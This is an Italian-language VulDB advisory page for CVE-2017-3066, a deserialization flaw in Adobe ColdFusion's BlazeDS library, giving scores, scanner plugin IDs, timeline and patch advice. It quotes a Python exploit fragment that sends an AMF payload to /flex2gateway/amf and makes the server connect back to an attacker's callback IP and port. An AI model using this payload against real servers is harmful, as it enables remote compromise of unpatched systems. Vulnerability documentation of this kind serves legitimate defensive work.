Adobe ColdFusion 10/11/2016 Apache BlazeDS Library escalazione di privilegi

CVSS Punteggio Meta TempExploit Prezzo Attuale (≈)Punteggio di interesse CTI
7.7$0-$5k0.00

È stata rilevata una vulnerabilità di livello critico in Adobe ColdFusion 10/11/2016 (Programming Language Software). Interessato da questa vulnerabilità è una funzione sconosciuta del componente Apache BlazeDS Library. Attraverso la manipolazione di un input sconosciuto per mezzo di una vulerabilità di classe escalazione di privilegi. Questo ha effetti su riservatezza, integrità e disponibilità.

Data di scoperta del problema 25/04/2017. La vulnerabilità è stata pubblicata in data 25/04/2017 con identificazione APSB17-14 con un security bulletin (Website) (confermato). L'advisory è scaricabile da helpx.adobe.com. Questo punto di criticità è identificato come CVE-2017-3066. L'attacco può avvenire nella rete. Per l'uso non è richiesta un'autentificazione. Non sono conosciuti dettagli tecnici ma un pubblico metodo di utilizzo è disponibile.

Un metodo di utilizzo è stato sviluppato da Faisal Tameesh in Python ed è stata pubblicata 11 mesi dopo il comunicato. L'exploit è scaricabile da exploit-db.com. È stato dichiarato come proof-of-concept. Per lo scanned Nessus, è disponibile un plugin, numero ID 99731 (Adobe ColdFusion BlazeDS Java Object Deserialization RCE), che può aiutare a determinare l'esistenza della criticità nel sistema analizzato. Il codice utilizzato dal exploit è:

amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
              '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
              struct.pack('>I', int(callback_port)) + \
              '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00';
 
url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)

Applicando a patch è possibile eliminare il problema. Una possibile soluzione è stata pubblicata immediatamente dopo la pubblicazione della vulnerabilità.

La vulnerabilità è documentata anche nel database Tenable (99731) e Exploit-DB (43993).

Prodottoinfo

Genere

Fornitore

Nome

Versione

Licenza

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

CVSSv3info

VulDB Punteggio meta-base: 8.5
VulDB Punteggio Meta Temp: 8.2

VulDB Punteggio di base: 7.3
VulDB Punteggio temporaneo: 6.6
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍

NVD Punteggio di base: 9.8
NVD Vettore: 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VettoreComplessitàAutenticazioneRiservatezzaIntegritàDisponibilità
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare
sbloccaresbloccaresbloccaresbloccaresbloccaresbloccare

VulDB Punteggio di base: 🔍
VulDB Punteggio temporaneo: 🔍
VulDB Affidabilità: 🔍

NVD Punteggio di base: 🔍

Exploitinginfo

Classe: Escalazione di privilegi
CWE: CWE-502 / CWE-20
CAPEC: 🔍
ATT&CK: 🔍

Locale: No
Remoto: Si

Disponibilità: 🔍
Accesso: Pubblico
Stato: Proof-of-Concept
Autore: Faisal Tameesh
Linguaggio Di Programmazione: 🔍
Scaricamento: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Previsione dei prezzi: 🔍
Preventivo attuale: 🔍

0-Daysbloccaresbloccaresbloccaresbloccare
Oggisbloccaresbloccaresbloccaresbloccare

Nessus ID: 99731
Nessus Nome: Adobe ColdFusion BlazeDS Java Object Deserialization RCE
Nessus File: 🔍
Nessus Rischio: 🔍
Nessus Family: 🔍
Nessus Context: 🔍

OpenVAS ID: 801267
OpenVAS Nome: Adobe ColdFusion Remote Code Execution And Cross Site Scripting Vulnerabilities
OpenVAS File: 🔍
OpenVAS Family: 🔍

Qualys ID: 🔍
Qualys Nome: 🔍

Exploit-DB: 🔍

Intelligence Sulle Minacceinfo

Interesse: 🔍
Attori Attivi: 🔍
Gruppi APT attivi: 🔍

Contromisureinfo

Raccomandazione: Patch
Stato: 🔍

Tempo di reazione: 🔍
0 giorni di tempo: 🔍
Tempo di esposizione: 🔍
Sfrutta il tempo di ritardo: 🔍
Suricata ID: 2025836
Suricata Classe: 🔍
Suricata Message: 🔍

Sequenza temporaleinfo

02/12/2016 🔍
25/04/2017 +144 giorni 🔍
25/04/2017 +0 giorni 🔍
25/04/2017 +0 giorni 🔍
25/04/2017 +0 giorni 🔍
26/04/2017 +1 giorni 🔍
27/04/2017 +1 giorni 🔍
27/04/2017 +0 giorni 🔍
28/04/2017 +1 giorni 🔍
07/02/2018 +285 giorni 🔍
07/02/2018 +0 giorni 🔍
21/12/2020 +1048 giorni 🔍

Fontiinfo

Fornitore: adobe.com

Advisory: APSB17-14
Riceratore: Moritz Bechler
Stato: Confermato
Confermato: 🔍

CVE: CVE-2017-3066 (🔍)
SecurityTracker: 1038364
SecurityFocus: 98003 - Adobe Flex BlazeDS CVE-2017-3066 Remote Code Execution Vulnerability

scip Labs: https://www.scip.ch/en/?labs.20161013
Vedi anche: 🔍

Voceinfo

Data di creazione: 27/04/2017 16:47
Aggiornamenti: 21/12/2020 15:32
I cambiamenti: 27/04/2017 16:47 (94), 03/01/2020 11:12 (4), 21/12/2020 15:32 (2)
Completa: 🔍

Discussione

Ancora nessun commento. Le Lingue: it + en.

Effettua il login per commentare.

Do you want to use VulDB in your project?

Use the official API to access entries easily!